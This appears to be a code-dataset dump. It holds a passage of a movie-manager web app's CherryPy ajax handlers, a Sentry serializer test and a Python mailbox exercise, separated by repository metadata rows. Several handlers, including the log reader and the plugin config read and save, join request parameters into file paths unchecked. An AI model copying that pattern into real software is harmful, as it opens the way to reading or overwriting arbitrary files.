def search(self, imdbid):
''' Search indexers for specific movie.
imdbid (str): imdb id #
Gets movie data from database and sends to searcher.search()
Returns dict ajax-style response
'''
movie = core.sql.get_movie_details("imdbid", imdbid)
if not movie:
return {'response': False, 'error': Errors.database_read.format(imdbid)}
else:
success = self.searcher.search(imdbid, movie['title'], movie['year'], movie['quality'])
status = core.sql.get_movie_details("imdbid", imdbid)['status']
if success:
results = core.sql.get_search_results(imdbid, movie['quality'])
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results, 'movie_status': status, 'next': Conversions.human_datetime(core.NEXT_SEARCH)}
else:
return {'response': False, 'error': Errors.database_read.format(imdbid), 'movie_status': status}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_download(self, year, guid, kind):
''' Sends search result to downloader manually
guid (str): download link for nzb/magnet/torrent file.
kind (str): type of download (torrent, magnet, nzb)
Returns dict ajax-style response
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
return {'response': False, 'error': _('Link is NZB but no Usent client is enabled.')}
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return {'response': False, 'error': _('Link is Torrent/Magnet but no Torrent client is enabled.')}
data = dict(core.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return self.snatcher.download(data)
else:
return {'response': False, 'error': Errors.database_read.format(kind)}
@cherrypy.expose
@cherrypy.tools.json_out()
def mark_bad(self, guid, imdbid, cancel_download=False):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
cancel_download (bool): send command to download client to cancel download
Returns dict ajax-style response
'''
sr_orig = core.sql.get_single_search_result('guid', guid)
sr = core.manage.searchresults(guid, 'Bad')
core.manage.markedresults(guid, 'Bad', imdbid=imdbid)
if sr:
response = {'response': True, 'message': _('Marked release as Bad.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = core.manage.movie_status(imdbid)
if not response['movie_status']:
response['error'] = (Errors.database_write)
response['response'] = False
if cancel_download:
cancelled = False
if sr_orig.get('status') != 'Snatched':
return response
client = sr_orig['download_client'] if sr_orig else None
downloadid = sr_orig['downloadid'] if sr_orig else None
if not client:
logging.info('Download client not found, cannot cancel download.')
return response
elif client == 'NZBGet':
cancelled = nzbget.Nzbget.cancel_download(downloadid)
elif client == 'SABnzbd':
cancelled = sabnzbd.Sabnzbd.cancel_download(downloadid)
elif client == 'QBittorrent':
cancelled = qbittorrent.QBittorrent.cancel_download(downloadid)
elif client == 'DelugeRPC':
cancelled = deluge.DelugeRPC.cancel_download(downloadid)
elif client == 'DelugeWeb':
cancelled = deluge.DelugeWeb.cancel_download(downloadid)
elif client == 'Transmission':
cancelled = transmission.Transmission.cancel_download(downloadid)
elif client == 'rTorrentSCGI':
cancelled = rtorrent.rTorrentSCGI.cancel_download(downloadid)
elif client == 'rTorrentHTTP':
cancelled = rtorrent.rTorrentHTTP.cancel_download(downloadid)
if not cancelled:
response['response'] = False
response['error'] = response.get('error', '') + _(' Could not remove download from client.')
return response
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
index (str/int): index of notification to remove
'index' will be of type string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
notification.remove(int(index))
return
@cherrypy.expose
@cherrypy.tools.json_out()
def update_check(self):
''' Manually check for updates
Returns list:
[0] dict ajax-style response
[1] dict of core notifications
'''
response = self.version.manager.update_check()
if response['status'] == 'current':
n = [[{'message': _('No updates available.')}, {'type': 'primary'}]]
return [response, n]
else:
return [response, core.NOTIFICATIONS]
@cherrypy.expose
@cherrypy.tools.json_out()
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
mode (str): which downloader to test.
data (dict): connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns dict ajax-style response
'''
response = {}
data = json.loads(data)
if mode == 'sabnzbd':
test = sabnzbd.Sabnzbd.test_connection(data)
elif mode == 'nzbget':
test = nzbget.Nzbget.test_connection(data)
elif mode == 'blackhole':
test = blackhole.Base.test_connection(data)
elif mode == 'transmission':
test = transmission.Transmission.test_connection(data)
elif mode == 'delugerpc':
test = deluge.DelugeRPC.test_connection(data)
elif mode == 'delugeweb':
test = deluge.DelugeWeb.test_connection(data)
elif mode == 'qbittorrent':
test = qbittorrent.QBittorrent.test_connection(data)
elif mode == 'rtorrentscgi':
test = rtorrent.rTorrentSCGI.test_connection(data)
elif mode == 'rtorrenthttp':
test = rtorrent.rTorrentHTTP.test_connection(data)
if test is True:
response['response'] = True
response['message'] = _('Connection successful.')
else:
response['response'] = False
response['error'] = test
return response
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
mode (str): command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
if mode == 'restart':
threading.Timer(1, core.restart).start()
return
elif mode == 'shutdown':
threading.Timer(1, core.shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_server(self, mode):
''' Starts and executes update process.
mode (str): 'set_true' or 'update_now'
This method has two major functions based on mode
set_true:
Sets core.UPDATING to True, the browser should then automatically redirect
the user to the update page that calls update_server('update_now')
update_now:
Starts update process:
* Stops task scheduler to cancel all Timers
* Waits for in-process tasks to finish. Yields to browser a list of
currently-running tasks every 1.5 seconds
* Yields updating message to browser. Calls update method
* Sets core.UPDATING to False
* Yields response from update method to browser
If False, starts scheduler plugin again to get back to a normal state
If True, calls restart method. Browser is responsible for redirecting
afer the server is back up.
Returns dict ajax-style response
'''
if mode == 'set_true':
core.UPDATING = True
return json.dumps({'response': True})
if mode == 'update_now':
logging.info('Update process started.')
core.scheduler_plugin.stop()
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
while len(active_tasks) > 0:
yield json.dumps({'response': True, 'status': 'waiting', 'active_tasks': active_tasks})
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
time.sleep(1.5)
yield json.dumps({'response': True, 'status': 'updating'})
update_status = version.Version().manager.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False, 'error': _('Unable to complete update.')})
core.scheduler_plugin.restart()
elif update_status is True:
yield json.dumps({'response': True, 'status': 'complete'})
self.server_status('restart')
else:
return json.dumps({'response': False})
update_server._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def update_movie_options(self, quality, status, imdbid):
''' Updates quality settings for individual title
quality (str): name of new quality
status (str): management state ('automatic', 'disabled')
imdbid (str): imdb identification number
Returns dict ajax-style response
'''
success = {'response': True, 'message': _('Movie settings updated.')}
logging.info('Updating quality profile to {} for {}.'.format(quality, imdbid))
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
new_status = core.manage.movie_status(imdbid)
if not new_status:
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = new_status
return success
elif status == 'Disabled':
if not core.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = 'Disabled'
return success
@cherrypy.expose
def get_log_text(self, logfile):
''' Gets log file contents
logfile (str): name of log file to read
logfile should be filename only, not the path to the file
Returns str
'''
logging.info('Dumping log file {} to text.'.format(logfile))
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
@cherrypy.tools.json_out()
def indexer_test(self, indexer, apikey, mode):
''' Tests connection to newznab indexer
indexer (str): url of indexer
apikey (str): indexer's api key
mode (str): newznab or torznab
Returns dict ajax-style response
'''
if mode == 'newznab':
return newznab.NewzNab.test_connection(indexer, apikey)
elif mode == 'torznab':
return torrent.Torrent.test_connection(indexer, apikey)
else:
return {'response': False, 'error': _('Invalid test mode.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder (str): folder to read config file from
conf (str): filename of config file (ie 'my_plugin.conf')
Returns string
'''
c = os.path.join(core.PLUGIN_DIR, folder, conf)
logging.info('Reading plugin config {}'.format(c))
try:
with open(c) as f:
config = json.load(f)
except Exception as e:
logging.error("Unable to read config file.", exc_info=True)
return ''
return plugins.render_config(config)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_plugin_conf(self, folder, filename, config):
''' Calls plugin_conf_popup to render html
folder (str): folder to store config file
filename (str): filename of config file (ie 'my_plugin.conf')
config (str): json data to store in conf file
Returns dict ajax-style response
'''
conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, filename)
logging.info('Saving plugin config as {}'.format(conf_file))
config = json.loads(config)
response = {'response': True, 'message': _('Settings saved.')}
try:
with open(conf_file, 'w') as output:
json.dump(config, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return response
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive):
''' Calls library to scan directory for movie files
directory (str): directory to scan
minsize (str/int): minimum file size in mb, coerced to int
resursive (bool): whether or not to search subdirs
Finds all files larger than minsize in directory.
Removes all movies from gathered list that are already in library.
If error, yields {'error': reason} and stops Iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
{'incomplete': {<knownn metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
Yeilds dict ajax-style response
'''
recursive = json.loads(recursive)
minsize = int(minsize)
files = core.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
raise StopIteration()
library = [i['imdbid'] for i in core.sql.get_user_movies()]
files = files['files']
length = len(files)
if length == 0:
yield json.dumps({'response': None})
raise StopIteration()
logging.info('Parsing {} directory scan results.'.format(length))
for index, path in enumerate(files):
logging.info('Gathering metatadata for {}'.format(path))
metadata = {}
response = {'progress': [index + 1, length]}
try:
metadata = self.metadata.from_file(path)
if not metadata.get('imdbid'):
metadata['imdbid'] = ''
logging.info('IMDB unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
elif metadata['imdbid'] in library:
logging.info('{} ({}) already in library, ignoring.'.format(metadata['title'], path))
response['response'] = 'in_library'
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
else:
logging.info('All data found for import {}'.format(metadata['title']))
response['response'] = 'complete'
if response['response'] == 'complete':
p = metadata.get('poster_path')
metadata = self.metadata.convert_to_db(metadata)
metadata['poster_path'] = p
metadata['size'] = os.path.getsize(path)
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
metadata['finished_file'] = path
if response['response'] == 'in_library':
metadata = {'title': metadata['title']}
response['movie'] = metadata
yield json.dumps(response)
except Exception as e:
logging.warning('Error gathering metadata.', exc_info=True)
yield json.dumps({'response': 'incomplete', 'movie': metadata})
continue
scan_library_directory._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def import_dir(self, movies, corrected_movies):
''' Imports list of movies in data
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
logging.info('Adding directory scan movies to library.')
today = str(datetime.date.today())
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('{} corrected movies, gathering metadata.'.format(len(corrected_movies)))
for data in corrected_movies:
tmdbdata = self.tmdb._search_tmdbid(data['tmdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['tmdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['tmdbid'])})
progress += 1
logging.info('Adding {} directory scan movies to library.'.format(len(movie_data)))
for movie in movie_data:
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Directory Import'
movie['finished_date'] = today
movie['id'] = movie['tmdbid']
response = core.manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['title']))
logging.debug(movie)
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['title'])})
progress += 1
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
core.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir (str): base path
move_dir (str): child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Returns dict ajax-style response
'''
current_dir = current_dir.strip()
move_dir = move_dir.strip()
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['list'] = [i for i in os.listdir(new_path) if os.path.isdir(os.path.join(new_path, i)) and not i.startswith('.')]
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def update_metadata(self, imdbid, tmdbid=None):
''' Re-downloads metadata for imdbid
imdbid (str): imdbid of movie
tmdbid (str): tmdbid of movie <optional - default None>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
Returns dict ajax-style response
'''
r = self.metadata.update(imdbid, tmdbid)
if r['response'] is True:
return {'response': True, 'message': _('Metadata updated.')}
else:
return r
@cherrypy.expose
@cherrypy.tools.json_out()
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url (str): url of kodi server
Calls Kodi import method to gather list.
Returns dict ajax-style response
'''
return library.ImportKodiLibrary.get_movies(url)
@cherrypy.expose
def import_kodi_movies(self, movies):
''' Imports list of movies in movies from Kodi library
movie_data (str): json-formatted list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
logging.info('Adding {} Kodi movies to library.'.format(length))
for movie in movies:
tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])
if not tmdb_data or not tmdb_data.get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['finished_file'] = movie.get('finished_file', '').strip()
movie['origin'] = 'Kodi Import'
response = core.manage.add_movie(movie)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
core.sql.write_search_results(fake_results)
import_kodi_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def upload_plex_csv(self, file_input):
''' Recieves upload of csv from browser
file_input (b'str): csv file fo read
Reads/parses csv file into a usable dict
Returns dict ajax-style response
'''
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e:
logging.error('Unable to parse Plex CSV', exc_info=True)
return {'response': False, 'error': str(e)}
if csv_text:
return library.ImportPlexLibrary.read_csv(csv_text)
else:
return {'response': True, 'complete': [], 'incomplete': []}
@cherrypy.expose
def import_plex_csv(self, movies, corrected_movies):
''' Imports list of movies genrated by csv import
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('Adding {} Plex movies to library.'.format(len(corrected_movies)))
for movie in corrected_movies:
tmdbdata = self.tmdb._search_imdbid(movie['imdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
movie['year'] = tmdbdata['release_date'][:4]
movie.update(tmdbdata)
movie_data.append(movie)
else:
logging.error(Errors.tmdb_not_found.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
logging.info('Adding {} Plex movies to library.'.format(length))
for movie in movie_data:
logging.info('Importing Plex movie {} {}'.format(movie.get('title', ''), movie.get('year', '')))
fm = False
if not movie.get('imdbid') and movie.get('tmdbid'):
tmdb_data = self.tmdb._search_tmdbid(movie['tmdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
fm = True
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['tmdbid'])})
progress += 1
continue
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Plex Import'
if not movie.get('id'):
tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
response = core.manage.add_movie(movie, full_metadata=fm)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'error': response['error'], 'title': movie['title']})
progress += 1
continue
else:
logging.error(Errors.tmdb_not_found.format(movie['title']))
yield json.dumps({'response': False, 'progress': [progress, length], 'error': _('Unable to find IMDB ID for {} on TheMovieDB.').format(movie['title']), 'title': movie['title']})
progress += 1
continue
if fake_results:
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
if fake_results:
core.sql.write_search_results(fake_results)
import_plex_csv._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_cp_movies(self, url, apikey):
''' Gets movies from CP server
url (str): url to cp server
apikey (str): cp api key
Reads/parses cp api response
Returns dict ajax-style response
'''
url = '{}/api/{}/movie.list/'.format(url, apikey)
if not url.startswith('http'):
url = 'http://{}'.format(url)
return library.ImportCPLibrary.get_movies(url)
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
''' Imports movies from CP list to library
wanted (list): dicts of wanted movies
finished (list): dicts of finished movies
Yields dict ajax-style response
'''
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(wanted)))
for movie in wanted:
response = core.manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(finished)))
for movie in finished:
movie['predb'] = 'found'
movie['status'] = 'Disabled'
movie['origin'] = 'CouchPotato Import'
response = core.manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
core.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
core.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_backlog_search(self, movies):
''' Bulk manager action for backlog search
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk backlog search for {} movies.'.format(len(movies)))
ids = [i['imdbid'] for i in movies]
movies = [i for i in core.sql.get_user_movies() if i['imdbid'] in ids]
for i, movie in enumerate(movies):
title = movie['title']
year = movie['year']
imdbid = movie['imdbid']
year = movie['year']
quality = movie['quality']
logging.info("Performing backlog search for {} {}.".format(title, year))
if not self.searcher.search(imdbid, title, year, quality):
response = {'response': False, 'error': Errors.database_write, 'imdbid': imdbid, "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield json.dumps(response)
manager_backlog_search._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_update_metadata(self, movies):
''' Bulk manager action for metadata update
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk metadata update for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.metadata.update(movie.get('imdbid'), movie.get('tmdbid'))
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield json.dumps(response)
manager_update_metadata._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_quality(self, movies, quality):
''' Bulk manager action to change movie quality profile
movies (list): dicts of movies, must contain keys imdbid
quality (str): quality to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting quality to {} for: {}'.format(quality, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield json.dumps(response)
manager_change_quality._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_reset_movies(self, movies):
''' Bulk manager action to reset movies
movies (list): dicts of movies, must contain key imdbid
Removes all search results
Updates database row with db_reset dict
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Resetting status for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
logging.debug('Resetting {}'.format(movie['imdbid']))
imdbid = movie['imdbid']
if not core.sql.purge_search_results(imdbid):
yield json.dumps({'response': False, 'error': _('Unable to purge search results.'), 'imdbid': imdbid, "index": i + 1})
continue
db_reset = {'quality': 'Default',
'status': 'Waiting',
'finished_date': None,
'finished_score': None,
'backlog': 0,
'finished_file': None,
'predb': None,
'predb_backlog': None
}
if not core.sql.update_multiple('MOVIES', db_reset, imdbid=imdbid):
yield json.dumps({'response': False, 'error': Errors.database_write, 'imdbid': imdbid, "index": i + 1})
continue
yield json.dumps({'response': True, "index": i + 1})
manager_reset_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_remove_movies(self, movies):
''' Bulk action to remove movies
movies (list): dicts of movies, must contain key imdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Removing {} movies from library.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.remove_movie(movie['imdbid'])
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], "index": i + 1}
else:
response = {'response': True, "index": i + 1}
yield(json.dumps(response))
manager_remove_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def generate_stats(self):
''' Gets library stats for graphing page
Returns dict of library stats
'''
return core.manage.get_stats()
@cherrypy.expose
@cherrypy.tools.json_out()
def create_backup(self):
''' Creates backup zip file ./watcher.zip
Returns dict ajax-style response
'''
logging.info('Creating backup of Watcher as {}'.format(os.path.join(core.PROG_PATH, 'watcher.zip')))
try:
backup.backup(require_confirm=False)
except Exception as e:
logging.error('Unable to create backup.', exc_info=True)
return {'response': False, 'error': str(e)}
return {'response': True, 'message': _('Backup created as {}').format(os.path.join(core.PROG_PATH, 'watcher.zip'))}
@cherrypy.expose
@cherrypy.tools.json_out()
def restore_backup(self, fileUpload):
logging.info('Restoring backup from uploaded zip.')
n = datetime.datetime.today().microsecond
tmp_zip = os.path.join(core.PROG_PATH, 'restore_{}.zip'.format(n))
try:
with open(tmp_zip, 'wb') as f:
f.seek(0)
f.write(fileUpload.file.read())
logging.info('Restore zip temporarily stored as {}.'.format(tmp_zip))
backup.restore(require_confirm=False, file=tmp_zip)
logging.info('Removing temporary zip {}'.format(tmp_zip))
os.unlink(tmp_zip)
except Exception as e:
logging.error('Unable to restore backup.', exc_info=True)
return {'response': False}
threading.Timer(3, core.restart).start()
return {'response': True}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_task_execute(self, name):
''' Calls task's now() function to execute task now
name (str): name of scheduled task to run
Response includes core.NOTIFICATIONS so the browser can display any
notifications generated during the task.
Returns dict ajax-style response
'''
try:
logging.info('Manually executing task {}.'.format(name))
task = core.scheduler_plugin.task_list[name]
task.now()
le = task.last_execution
return {'response': True, 'message': _('Finished task {}.').format(name), 'last_execution': le, 'notifications': core.NOTIFICATIONS}
except Exception as e:
return {'response': False, 'error': str(e)}
| [
"[email protected]"
]
| |
12598f014099deae48cea3f0402d007713858b5a | 1fc45a47f0e540941c87b04616f3b4019da9f9a0 | /tests/sentry/api/serializers/test_grouptagvalue.py | d328f092a3656452391add7aa2fc5d6ee396d281 | [
"BSD-2-Clause"
]
| permissive | seukjung/sentry-8.15.0 | febc11864a74a68ddb97b146cc1d2438ef019241 | fd3cab65c64fcbc32817885fa44df65534844793 | refs/heads/master | 2022-10-28T06:39:17.063333 | 2018-01-17T12:31:55 | 2018-01-17T12:31:55 | 117,833,103 | 0 | 0 | BSD-3-Clause | 2022-10-05T18:09:54 | 2018-01-17T12:28:13 | Python | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.models import EventUser, GroupTagValue, TagValue
from sentry.testutils import TestCase
class GroupTagValueSerializerTest(TestCase):
def test_with_user(self):
user = self.create_user()
project = self.create_project()
euser = EventUser.objects.create(
project=project,
email='[email protected]',
)
tagvalue = TagValue.objects.create(
project=project,
key='sentry:user',
value=euser.tag_value,
)
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key=tagvalue.key,
value=tagvalue.value,
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == euser.get_label()
def test_with_no_tagvalue(self):
user = self.create_user()
project = self.create_project()
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key='sentry:user',
value='email:[email protected]',
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == grouptagvalue.value
| [
"[email protected]"
]
| |
d96347873e9e35694bfbbc5d8c3adf35d0c11a59 | 157d0810d40bbb165889f946566346663cf5b22f | /Python-For-Everyone-Horstmann/Chapter9-Objects-and-Classes/P9_25.py | 4f372df40188975237fd47929d3e6603486ef014 | []
| no_license | dg5921096/Books-solutions | e6ccdcaba0294bdc95e2267723a02d2ba090cb10 | 31bb4bba240bf95aafeb6d189eade62c66a1765a | refs/heads/master | 2021-12-09T16:07:47.756390 | 2021-11-14T07:09:25 | 2021-11-14T07:09:25 | 255,447,147 | 0 | 0 | null | 2020-04-13T21:39:02 | 2020-04-13T21:39:01 | null | UTF-8 | Python | false | false | 794 | py | # Design a class Mailbox that stores e-mail messages, using the Message class of Exercise
# P9.24. Implement the following methods:
# • def addMessage(self, message)
# • def getMessage(self, index)
# • def removeMessage(self, index)
class Mailbox():
def __init__(self):
self._mails = []
def list_messages(self):
output = []
for i, message in enumerate(self._mails):
output.append("[{}] From: {}, To: {}".format(i, message.get_sender(), message.get_recipient()))
return "\n".join(output)
